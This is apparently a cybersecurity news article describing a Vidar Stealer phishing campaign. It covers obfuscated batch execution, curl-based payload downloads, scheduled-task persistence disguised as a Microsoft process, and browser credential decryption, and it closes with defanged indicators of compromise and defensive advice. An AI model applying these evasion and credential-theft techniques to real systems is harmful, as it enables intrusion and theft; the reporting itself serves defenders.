New Stealthy Vidar Stealer Campaign Bypass EDR and Steal Credentials

HomeCyber Security News New Stealthy Vidar Stealer Campaign Bypass EDR and Steal Credentials By Tushar Subhra Dutta May 12, 2026 A new and highly stealthy campaign distributing Vidar Stealer has surfaced, targeting Windows users with a sophisticated attack chain designed to slip past endpoint defenses and harvest sensitive credentials. The campaign has drawn significant attention from the cybersecurity community because of how quietly it operates, often completing its theft before the victim ever realizes anything is wrong. Vidar Stealer is a well-known information-stealing malware that first appeared in 2018 as a derivative of the Arkei stealer. Over the years, it has evolved into a powerful tool capable of extracting browser passwords, session cookies, cryptocurrency wallet data, authentication tokens, and autofill information stored locally on infected machines. The latest campaign takes that capability further by incorporating advanced evasion mechanisms that allow it to bypass modern Endpoint Detection and Response tools with notable consistency. Security researchers at Genians Security Center identified the campaign and noted that it relies on multi-stage delivery techniques, obfuscated script execution, and the abuse of legitimate system tools to avoid raising alarms. Attack Flow of Police Official Impersonation Case (Source – Genians) The campaign’s ability to blend into normal system activity makes it particularly dangerous for organizations that rely on traditional signature-based detection methods alone. Initial access is achieved through spear-phishing emails carefully tailored to match the recipient’s professional context and interests. These messages carry ZIP-compressed attachments containing Windows shortcut files disguised as legitimate work documents. When a target opens the attachment and runs the shortcut file, an obfuscated command is quietly triggered in the background without showing any visible signs to the user. EDR Bypass Through Layered Obfuscation The malware then begins a chain of secondary payload downloads, eventually deploying its core information-stealing component onto the compromised system. Since each stage uses environment variable-based obfuscation to reconstruct commands only at runtime, static analysis tools often fail to identify the malicious intent until it is far too late for the victim to respond. Deobfuscated Batch File Commands (Source – Genians) One of the most notable aspects of this campaign is how it avoids triggering behavior-based detection systems. The threat actor uses environment variable-based substring expansion to split and reassemble commands character by character, so the full command string never appears in plaintext during execution. This technique forces security tools to evaluate each fragment individually rather than recognizing the full malicious intent behind the instruction. The attack also abuses curl.exe, a native Windows binary, to download additional payloads from remote servers. Using built-in operating system tools in this way is a tactic known as Living-off-the-Land, which is harder to flag because the tools themselves are legitimate system components. A Python Embed package is retrieved from a trusted external source to create a silent execution environment, reducing the suspicion tied to outbound network activity throughout the infection process. A scheduled task is then created under a name crafted to resemble a legitimate Microsoft system process, ensuring the malware persists across reboots and continues running at one-minute intervals. The final payload, a compiled Python bytecode file disguised with a .cat extension, functions as a remote access backdoor capable of executing commands, collecting files, and exfiltrating system data to attacker-controlled infrastructure. Credential Theft and Its Broader Impact Vidar’s core function in this campaign is extracting user credentials and other sensitive data stored within Chromium-based browsers and similar applications. It targets locally stored passwords, session cookies, and the encrypted key files that browsers use to protect login data from unauthorized access. The malware uses the Windows CryptUnprotectData API to decrypt these keys directly from the browser’s Local State file, granting it full access to saved credentials. Comparison of Similarities in XOR String Obfuscation (Source – Genians) Multiple command-and-control domains were identified during the investigation, spread across different countries and hosting providers, making infrastructure-based blocking considerably more difficult for defenders. The campaign’s reach across various sectors highlights just how broadly these credential theft tools are being deployed. Organizations are advised to strengthen behavior-based EDR capabilities to detect obfuscated script execution and multi-stage download activity. Blocking shortcut file execution from within archives, auditing scheduled tasks regularly, and avoiding saving credentials directly in browsers are concrete steps that can meaningfully reduce exposure to this growing threat. Indicators of Compromise (IoCs):- Type Indicator Description Domain kmot.co[.]kr Korea-based C2 server hosting malicious payloads Domain haeundaejugong[.]com C2 server used to collect and exfiltrate user data Domain kumdo[.]org Secondary C2 server for data exfiltration Domain nls5950.cafe24[.]com C2 infrastructure used in related malicious activity Domain hanainternational[.]net C2 domain linked to threat actor infrastructure Domain mlgpf.ir114[.]net C2 domain associated with campaign Domain luminix[.]kr C2 domain identified in related malicious files Domain sunlin[.]org C2 domain observed in threat actor infrastructure Domain ezvm[.]kr C2 domain linked to malicious distribution Domain intobiz[.]kr C2 domain used in campaign infrastructure Domain choisy[.]fr France-based C2 server observed in attack chain Domain printory[.]kr Domain used to host compiled Python bytecode malware Domain udcontest[.]com Domain hosting webshell used in phishing attack Domain ableinfo.co[.]kr Distribution infrastructure for malicious files IP Address 114.207.246[.]156 IP address shared across multiple attack domains File Name settingenv.cat Compiled Python bytecode payload disguised as Windows catalog file File Name codeflush.exe Renamed pythonw.exe used as stealthy malware execution host File Name GX)/M27s.bat Obfuscated batch file used for secondary payload execution File Name ms3360.bat Batch file variant used in obfuscated execution chain File Name yS1825.bat Batch file variant identified in attack chain File Name K3772.bat Batch file variant used in environment variable obfuscation File Name HqcUpdate.exe Final information-stealing payload (Chinotto) File Name WStep163.cab Obfuscated Python script downloaded from C2 server File Name MicroAppsTemp28h2.bat Batch file downloaded from C2 for follow-up activity Scheduled Task MicrosoftMusicLibrariesPackageTaskMachine Persistence mechanism disguised as legitimate Microsoft task Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Vimeo Data Breach Exposes 119,000 Users Unique Email Addresses Critical Ollama Memory Leak Vulnerability Exposes 300,000 Servers Globally New BitUnlocker Downgrade Attack on Windows 11 Allows Access to Encrypted Disks in 5 Minutes Fake Moustache Bypasses Age Verification System Raising Online Safety Act Concerns Critical Microsoft 365 Copilot Vulnerabilities Expose sensitive Information Latest News Cyber Security News Hackers Hijack Microsoft Teams Accounts to Deliver ModeloRAT Cyber Security News North Korean Hackers Weaponize Git Hooks to Deploy Cross-Platform Malware AI Critical “Cline” AI Agent Vulnerability Enables RCE Attacks Cyber Security News Malicious Chrome MV3 Extension Impersonates TronLink to Steal Crypto Wallet Credentials Cyber Security News MistralAI PyPI Package Compromised to Inject Malicious Code – Microsoft Warns